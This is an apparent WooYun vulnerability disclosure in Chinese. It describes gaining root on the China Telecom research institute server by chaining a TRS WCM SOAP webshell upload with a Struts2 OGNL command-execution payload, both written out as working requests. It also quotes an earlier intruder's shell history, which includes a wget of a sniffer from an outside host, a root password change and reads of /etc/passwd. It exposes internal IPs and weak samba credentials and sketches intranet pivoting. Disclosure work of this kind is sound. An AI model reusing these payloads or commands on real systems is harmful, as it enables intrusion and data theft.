当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038579

漏洞标题:多个漏洞导致电信研究院服务器沦陷

相关厂商:中国电信研究院

漏洞作者: 想要减肥的胖纸

提交时间:2013-10-12 14:01

修复时间:2013-11-26 14:01

公开时间:2013-11-26 14:01

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-12: 细节已通知厂商并且等待厂商处理中
2013-10-16: 厂商已经确认,细节仅向厂商公开
2013-10-26: 细节向核心白帽子及相关领域专家公开
2013-11-05: 细节向普通白帽子公开
2013-11-15: 细节向实习白帽子公开
2013-11-26: 细节向公众公开

简要描述:

问题比较敏感,标题写出来可能会造成不必要的危害

详细说明:

利用多个漏洞组合,获取到主站权限,同时进入内网,可对内网进行渗透。
1.trs soap 上传漏洞
2.struts 命令执行漏洞
3.服务器配置不当
通过trs soap上传webshell到tmp目录下,(由于trsweb目录设置,未登录下访问*.jsp文件跳转到登录页面)其实这个问题是个低风险,正常下trs上传不会传到web解析目录。(同时该服务器存在 WooYun: TRS WCM 6.X系统任意文件写入漏洞 漏洞)

POST /wcm/services/trswcm:UploadService HTTP/1.0
Content-Length: 644
SOAPAction: ""
Content-Type: text/xml
Host: www.catr.cn
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://www.catr.cn/wcm/services/trswcm:UploadService">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <uploadFile>
         <in0>base64-webshell-code</in0>
         <in1>shell.txt</in1>
         <in2>false</in2>
        </uploadFile>
     </SOAP-ENV:Body>


利用服务器存在的struts漏洞把shell mv到可以解析的目录下

http://www.catr.cn/zhaopin_society/regist.action


post:

redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'mv','/tmp/shell.txt','/root/TRS/TRSWCMV65Plugins/Tomcat/webapps/zhaopin_society/test21.jsp'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}


/root/TRS/TRSWCMV65Plugins/Tomcat/webapps/zhaopin_society目录为社会招聘目录,未登录下,访问所有jsp后缀文件提示登录,好在提供注册页面,注册个用户,然后登录就可以访问获取的shell。
struts漏洞可能因为存在waf等原因,无法直接写入文件,才利用了这个曲折的办法。同时也建议做渗透的时候不必拘泥于一种方法,要开阔思路。
通过shell进入服务器,发现该服务器和vpn,mail在一个c段。如果被黑客恶意的session hijack 危害很大。
发现服务器被黑记录

w
id
ps x
ls -la /proc/22995
cd /tmp/.j/.j
ls -a
ps x
ls -a
cd ..
kls -a
ls a
ls -a
cat /etc/issue
cd /root
wget x.hackersoft.org/altele/snif-2013.tgz
passwd root
/usr/sbin/sshd
cat /proc/cpuifo
id
uname -a
w
cat /proc/cpuinfo
cat /etc/issue
cat /etc/passwd
cd /root
ls -a
cat .bash_history
rm -rf 
ls -a
rm -rf snif-2013.tgz**
wget x.hackersoft.org/altele/snif-2013.tgz

该文件路径为/.bash_history
通过读取/root/.bash_history文件,发现使用samba 并存在弱口令,笔者也相信其他系统、pc、数据库也可能存在弱口令。

mount -o username=samba,password=samba //10.1.3.91/TRS /root/TRS/TRSWCMV6
history mount
mount -history
 mount history
 mount -o username=samba,password=samba //10.1.3.91/TRS /root/TRS/TRSWCMV6
mount -t nfs 10.10.2.29:/urp_cm_nas /urpdata/


通过查看上面的文件,发现管理员进行了iptables配置。如果想继续渗透内网,需要更改相关策略,所以没有深入。
由于该服务器运行较多的应用,存在多个数据库连接,可以查看数据库,获取敏感用户信息,利用相应的账户密码做字典破解sslvpn和mail会造成更大危害。
这里我们可以联想一下,黑客改了iptable然后升级下nmap,利用nmap自带的脚本去扫描弱口令。同时利用python做socket代理,直接进入内网,可以导致内网重要服务器沦陷

漏洞证明:

Server:		10.1.2.8
Address:	10.1.2.8#53
Name:	vpn.catr.cn
Address: 10.1.1.59
Server:		10.1.2.8
Address:	10.1.2.8#53
Name:	mail.catr.cn
Address: 10.1.1.163
Name:	mail.catr.cn
Address: 10.1.1.164


root pts/1 10.2.10.38 Sun Sep 29 09:47 - 10:21 (00:34)
通过查看last登录,可以确定网管的ip地址为10.2.10.38/24,有可能员工的办公ip在这个ip段。

修复方案:

联系trs修补相关漏洞,升级struts,对服务器进行安全加固,针对tomcat进行降权处理。同时清理history日志信息,防止信息泄露。
自查一下应用、数据库等是否存在弱口令。社会招聘的数据库用户名密码一样。
ps:渗透过程中已经尽量规避风险,请catr.cn相关维护人员清楚上传的脚本木马,并对所有文件检查,查看是否曾被上传过其他脚本木马。
看到校园招聘10月开始,可是我没学历。唉。
好想找个工作

版权声明:转载请注明来源 想要减肥的胖纸@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2013-10-16 19:04

厂商回复:

根据实时测试结果,CNVD未能复现所述情况,根据所述详情确认历史测试结果。由于白帽子已经通知厂商,暂未列入处置流程。
rank 18

最新状态:

暂无

漏洞评价:

评论

  1. 2013-10-12 14:12 | 想要减肥的胖纸 ( 普通白帽子 | Rank:250 漏洞数:42 )

    该漏洞已通过其他渠道报告给厂商。我这漏洞9月29或者30号提交的。